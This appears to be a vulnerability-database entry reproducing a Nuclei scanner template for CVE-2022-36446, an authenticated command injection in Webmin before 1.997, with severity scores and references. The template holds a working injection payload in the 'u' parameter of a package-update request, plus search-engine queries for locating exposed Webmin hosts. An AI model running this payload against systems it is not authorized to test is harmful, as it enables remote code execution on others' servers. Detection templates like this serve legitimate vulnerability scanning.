Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2022-36446
HistoryAug 21, 2022 - 5:03 a.m.

Webmin <1.997 - Authenticated Remote Code Execution

2022-08-2105:03:11
ProjectDiscovery
github.com
14

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

0.969 High

EPSS

Percentile

99.7%

Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
id: CVE-2022-36446

info:
  name: Webmin <1.997 - Authenticated Remote Code Execution
  author: gy741
  severity: critical
  description: |
    Webmin before 1.997 is susceptible to authenticated remote code execution via software/apt-lib.pl, which lacks HTML escaping for a UI command. An attacker can perform command injection attacks and thereby execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability allows an authenticated attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade Webmin to version 1.997 or later to mitigate this vulnerability.
  reference:
    - https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165
    - https://www.exploit-db.com/exploits/50998
    - https://github.com/webmin/webmin/compare/1.996...1.997
    - https://nvd.nist.gov/vuln/detail/CVE-2022-36446
    - http://packetstormsecurity.com/files/167894/Webmin-1.996-Remote-Code-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-36446
    cwe-id: CWE-116
    epss-score: 0.97131
    epss-percentile: 0.99752
    cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: webmin
    product: webmin
    shodan-query:
      - title:"Webmin"
      - http.title:"webmin"
    fofa-query: title="webmin"
    google-query: intitle:"webmin"
  tags: cve,cve2022,packetstorm,webmin,rce,authenticated,edb

http:
  - raw:
      - |
        POST /session_login.cgi HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pass={{password}}
      - |
        POST /package-updates/update.cgi HTTP/1.1
        Host: {{Hostname}}
        Referer: {{BaseURL}}/package-updates/update.cgi?xnavigation=1

        mode=new&search=ssh&redir=&redirdesc=&u=0%3Becho+%27{{randstr}}%27%27{{randstr}}%27%3B+id%3B+echo+%27{{randstr}}%27%27{{randstr}}%27&confirm=Install%2BNow

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{randstr}}'
          - 'uid'
          - 'gid'
          - 'groups'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022004f825553e762903ffda85a0fd7eaf8063b579220a2f47231b175b4b419ba3c502210098c36e5257622a24fcb4fc6a89ff4d759ee4236a9207de35cc34ae31f0d9b471:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High

AI Score

Confidence

High

0.969 High

EPSS

Percentile

99.7%